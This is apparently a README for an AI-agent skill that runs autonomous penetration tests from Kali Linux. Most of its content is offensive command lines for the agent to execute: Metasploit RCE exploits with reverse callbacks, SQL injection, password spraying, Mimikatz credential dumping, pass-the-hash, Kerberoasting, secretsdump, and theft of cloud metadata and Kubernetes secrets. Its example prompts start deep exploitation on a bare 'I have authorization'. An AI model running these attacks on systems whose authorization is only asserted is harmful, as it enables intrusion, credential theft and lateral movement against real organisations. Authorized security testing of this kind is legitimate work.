kali-pentest-ai-agent

Skill by ara.so — Security Skills collection.

An AI agent skill for autonomous penetration testing using Kali Linux. Provides 269 CLI security tools across 14 categories, 15+ scenario playbooks, intelligent attack path planning, cross-phase result integration, and mandatory human approval for high-risk actions. Unlike traditional automated scanners, this skill enables AI agents to adaptively plan, execute, and iterate through penetration testing phases like a human security researcher.

What It Does

Autonomous Attack Planning: AI agent analyzes targets and plans multi-phase attack paths
Tool Selection & Execution: Intelligently selects from 269+ Kali tools based on context
Cross-Phase Integration: Integrates findings across reconnaissance, scanning, exploitation, and post-exploitation
Adaptive Strategy: Adjusts testing approach based on intermediate results
Human Approval Gates: Requires explicit authorization before high-risk actions
Depth Control: Supports Quick/Standard/Deep testing modes with coverage matrices
Structured Reporting: Generates Markdown and HTML reports with evidence and remediation

Installation

1. Install the Skill

Copy the skill directory into your AI agent's skills folder:

bash

# For Claude Code (personal)
cp -r kali-pentest ~/.claude/skills/

# For Claude Code (project-specific)
cp -r kali-pentest .claude/skills/

# For OpenClaw
cp -r kali-pentest ~/.openclaw/skills/

# For Hermes Agent
cp -r kali-pentest ~/.hermes/skills/

2. Set Up Kali Environment

Choose one of three modes:

Local Mode (agent runs directly on Kali):

bash

# Ensure you're on Kali Linux
cat /etc/os-release | grep Kali

# Verify tool availability
which nmap metasploit-framework burpsuite

Server Mode (SSH to remote Kali):

bash

# Generate SSH key if needed
ssh-keygen -t ed25519 -f ~/.ssh/kali_key

# Copy public key to Kali server
ssh-copy-id -i ~/.ssh/kali_key.pub root@kali-server-ip

# Test connection
ssh -i ~/.ssh/kali_key root@kali-server-ip "uname -a"

Docker Mode (containerized Kali):

bash

# Pull Kali Docker image
docker pull kalilinux/kali-rolling

# Create persistent container
docker run -d --name kali-pentest \
  --network host \
  --cap-add=NET_ADMIN \
  --cap-add=NET_RAW \
  -v $(pwd)/kali-pentest:/workspace \
  kalilinux/kali-rolling tail -f /dev/null

# Install base tools
docker exec kali-pentest bash -c "apt update && apt install -y kali-linux-default"

3. Configure Environment Variables

bash

# Set Kali connection mode
export KALI_MODE="local"  # or "server" or "docker"

# For server mode
export KALI_SSH_KEY="$HOME/.ssh/kali_key"
export KALI_HOST="root@192.168.1.100"

# For docker mode
export KALI_CONTAINER="kali-pentest"

# Output directory for reports
export PENTEST_OUTPUT_DIR="$HOME/pentest-reports"
mkdir -p "$PENTEST_OUTPUT_DIR"

Key Commands & Usage

Invoke via Slash Command

bash

# In Claude Code or compatible agent
/kali-pentest

Invoke via Natural Language

Quick Scan Example:

Kali tools are available locally (this machine is Kali).
Target: 10.0.0.0/24
Quickly scan the target network for open ports and services.
I have authorization.

Standard Assessment Example:

The persistent Docker container `kali-pentest` is initialized.
Use Docker mode to run a web application penetration test against http://192.168.1.50.
I have authorization.

Deep Assessment Example:

Kali server: ssh -i ~/.ssh/kali_key root@192.168.1.100
First run a full port scan against 192.168.1.50, then plan and execute 
an in-depth penetration test — do not overlook any potential weakness.
I have authorization.

Core Workflow

The agent executes five steps:

Step 1: Environment Setup

bash

# Agent verifies Kali access
ssh -i ~/.ssh/kali_key root@kali-host "which nmap metasploit sqlmap"

# Or local mode
which nmap metasploit sqlmap

# Or docker mode
docker exec kali-pentest which nmap metasploit sqlmap

Step 2: Planning

bash

# Agent confirms authorization and scope
# Selects appropriate playbook from decision tree:
# - external-network.md
# - internal-network.md
# - web-application.md
# - active-directory.md
# - api-security.md
# - cloud-native.md
# - mobile-application.md
# - wireless-network.md
# - password-audit.md
# - source-code-audit.md
# - social-engineering.md
# - physical-security.md
# - voip-ics.md
# - post-exploitation.md
# - reporting.md

Step 3: Execute Phases

Reconnaissance:

bash

# Host discovery
nmap -sn 192.168.1.0/24 -oN hosts.txt

# DNS enumeration
dig @8.8.8.8 example.com ANY +noall +answer
dnsenum --enum example.com

# Subdomain discovery
subfinder -d example.com -o subdomains.txt

Port Scanning:

bash

# Quick scan
nmap -T4 -F 192.168.1.50

# Full TCP scan with service detection
nmap -p- -sV -sC -O 192.168.1.50 -oA full-scan

# UDP scan for common services
nmap -sU --top-ports 100 192.168.1.50 -oN udp-scan.txt

Vulnerability Detection:

bash

# Nmap vulnerability scripts
nmap --script vuln 192.168.1.50 -oN vuln-scan.txt

# Web vulnerability scanning
nikto -h http://192.168.1.50 -output nikto.txt

# SSL/TLS testing
sslscan --no-failed 192.168.1.50:443

Exploitation:

bash

# Metasploit Framework
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; \
  set RHOST 192.168.1.50; set LHOST 192.168.1.10; exploit"

# SQL injection
sqlmap -u "http://192.168.1.50/page?id=1" --dbs --batch

# Password spraying
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

Post-Exploitation:

bash

# Privilege escalation enumeration
linpeas.sh | tee linpeas-output.txt

# Credential dumping
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

# Lateral movement
crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Step 4: Analyze & Iterate

Agent integrates results across phases:

python

# Example: Agent logic (pseudocode)
if redis_noauth_found:
    exploit_redis_for_shell()
    if shell_obtained:
        run_privilege_escalation_enum()
        if credentials_found:
            attempt_lateral_movement()

Step 5: Report Generation

bash

# Generate Markdown report
cat > report.md <<EOF
# Penetration Test Report

## Executive Summary
- Target: 192.168.1.50
- Date: $(date)
- Severity: Critical findings detected

## Findings
### [CRITICAL] Unauthenticated Redis Access
**Evidence**: \`\`\`redis-cli -h 192.168.1.50 INFO\`\`\`
**Impact**: Remote code execution via Redis module injection
**Remediation**: Enable authentication with \`requirepass\` directive

## Attack Chain
Redis no-auth → SSH shell → SUID privesc → root access
EOF

# Convert to HTML (agent uses reporting tools)
markdown report.md > report.html

Common Patterns

Pattern 1: Network Penetration Test

bash

# Phase 1: Discovery
nmap -sn $TARGET_NETWORK -oG - | grep "Up" | cut -d' ' -f2 > live-hosts.txt

# Phase 2: Port scanning
while read host; do
  nmap -p- -sV -sC "$host" -oN "scan-$host.txt"
done < live-hosts.txt

# Phase 3: Vulnerability assessment
for host in $(cat live-hosts.txt); do
  nmap --script vuln "$host" -oN "vuln-$host.txt"
done

# Phase 4: Exploitation (with approval)
# Agent pauses here for human confirmation
msfconsole -r exploit-script.rc

Pattern 2: Web Application Test

bash

# Passive reconnaissance
whatweb http://$TARGET
wafw00f http://$TARGET

# Active scanning
nikto -h http://$TARGET -output nikto.html -Format html
zap-cli quick-scan --self-contained http://$TARGET

# Targeted exploitation
sqlmap -u "http://$TARGET/page?id=1" --risk 3 --level 5 --batch
wpscan --url http://$TARGET --enumerate vp,vt,u

Pattern 3: Active Directory Assessment

bash

# Initial enumeration
crackmapexec smb $DC_IP -u '' -p '' --shares
ldapsearch -x -h $DC_IP -b "DC=corp,DC=example,DC=com"

# Kerberoasting
impacket-GetUserSPNs corp.example.com/user:password -dc-ip $DC_IP -request

# Bloodhound collection
bloodhound-python -d corp.example.com -u user -p password -ns $DC_IP -c all

# Post-exploitation
impacket-secretsdump corp.example.com/admin@$DC_IP

Pattern 4: Cloud-Native Security

bash

# Kubernetes enumeration
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o json | grep -i password

# Container escape detection
amicontained

# Cloud metadata access
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

Configuration

Depth Settings

Control testing thoroughness via natural language:

Trigger Phrase	Depth	Coverage
"quick scan", "fast check"	Quick	Top 100 ports, common vulnerabilities
(default)	Standard	Full TCP, service fingerprinting, OWASP Top 10
"comprehensive", "deep", "thorough"	Deep	All ports, exhaustive vulnerability checks, manual verification

Approval Gates

High-risk actions require explicit human confirmation:

Exploitation attempts (RCE, privilege escalation)
Credential dumping
Lateral movement
Service disruption (DoS tests)
Data exfiltration

Agent will pause and request approval:

🔴 HIGH-RISK ACTION REQUIRES APPROVAL:
Execute Metasploit exploit against 192.168.1.50 (RCE attempt)

Type 'APPROVE' to proceed or 'DENY' to skip:

Troubleshooting

Connection Issues

bash

# Test SSH connection
ssh -i $KALI_SSH_KEY -v $KALI_HOST "echo 'Connection OK'"

# Test Docker connection
docker exec $KALI_CONTAINER echo "Container OK"

# Check network connectivity from Kali
ssh -i $KALI_SSH_KEY $KALI_HOST "ping -c 3 $TARGET_IP"

Tool Not Found

bash

# Install missing tool (server mode)
ssh -i $KALI_SSH_KEY $KALI_HOST "apt update && apt install -y <tool-name>"

# Install in Docker
docker exec $KALI_CONTAINER bash -c "apt update && apt install -y <tool-name>"

Permission Errors

bash

# Grant NET_ADMIN capability (Docker)
docker run --cap-add=NET_ADMIN --cap-add=NET_RAW ...

# Run as root (server mode)
ssh -i $KALI_SSH_KEY root@$KALI_HOST

# Check sudo privileges
ssh -i $KALI_SSH_KEY $KALI_HOST "sudo -l"

Output Collection Failures

bash

# Ensure output directory exists
mkdir -p $PENTEST_OUTPUT_DIR

# Check disk space
df -h $PENTEST_OUTPUT_DIR

# Verify write permissions
touch $PENTEST_OUTPUT_DIR/test && rm $PENTEST_OUTPUT_DIR/test

Agent Stops Early

If coverage is insufficient:

The current pentest results are not comprehensive enough. 
Check the playbook's "Stop When" conditions and coverage matrix.
Have all required tool categories been utilized?

Real-World Examples

Example 1: External Network Pentest

bash

# Reconnaissance
amass enum -d target.com -o subdomains.txt
nmap -iL subdomains.txt -p 80,443,8080,8443 -oA web-services

# Vulnerability scanning
nuclei -l web-services.txt -t cves/ -o nuclei-findings.txt

# Exploitation (approved)
msfconsole -x "use exploit/multi/http/apache_log4j_rce; set RHOST 10.0.0.50; exploit"

# Report
cat nuclei-findings.txt web-services.nmap > final-report.md

Example 2: Internal Network Compromise

bash

# Initial foothold via phishing (simulated)
# Now on internal network: 172.16.0.0/16

# Host discovery
netdiscover -r 172.16.0.0/16 -P

# Lateral movement
crackmapexec smb 172.16.0.0/16 -u admin -H $NTLM_HASH --sam

# Domain enumeration
bloodhound-python -d corp.local -u admin -p $PASSWORD -c all -ns 172.16.0.10

# Domain admin compromise
impacket-psexec corp.local/dadmin@172.16.0.10 -hashes :$DA_HASH

Example 3: API Security Assessment

bash

# Parse OpenAPI spec
cat openapi.yaml | grep -E "paths:|/api/"

# Automated fuzzing
ffuf -w /usr/share/wordlists/api-endpoints.txt \
  -u https://api.target.com/FUZZ \
  -H "Authorization: Bearer $API_TOKEN"

# Authentication bypass testing
sqlmap -u "https://api.target.com/user?id=1" \
  -H "Authorization: Bearer $API_TOKEN" \
  --batch --level 5

Documentation References

Official Kali Docs: https://www.kali.org/docs/
Playbooks:
```
kali-pentest/references/playbooks/
```
Tool Categories:
```
kali-pentest/references/<category>/
```
Environment Setup:
```
kali-pentest/references/environment/
```

Tested Models

Optimized for:

```
claude-opus-4.6
```
```
claude-sonnet-4.6
```
```
deepseek-v4-pro
```
```
qwen3.6:27b
```
(local, requires ≥128K context)

Legal & Ethical Use

⚠️ AUTHORIZATION REQUIRED: This skill is for authorized penetration testing only. Always obtain explicit written permission before testing any target. Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), and similar laws worldwide.

kali-pentest-ai-agent

NPX Install

Tags

SKILL.md Content

kali-pentest-ai-agent

What It Does

Installation

1. Install the Skill

2. Set Up Kali Environment

3. Configure Environment Variables

Key Commands & Usage

Invoke via Slash Command

Invoke via Natural Language

Core Workflow

Step 1: Environment Setup

Step 2: Planning

Step 3: Execute Phases

Step 4: Analyze & Iterate

Step 5: Report Generation

Common Patterns

Pattern 1: Network Penetration Test

Pattern 2: Web Application Test

Pattern 3: Active Directory Assessment

Pattern 4: Cloud-Native Security

Configuration

Depth Settings

Approval Gates

Troubleshooting

Connection Issues

Tool Not Found

Permission Errors

Output Collection Failures

Agent Stops Early

Real-World Examples

Example 1: External Network Pentest

Example 2: Internal Network Compromise

Example 3: API Security Assessment

Documentation References

Tested Models

Legal & Ethical Use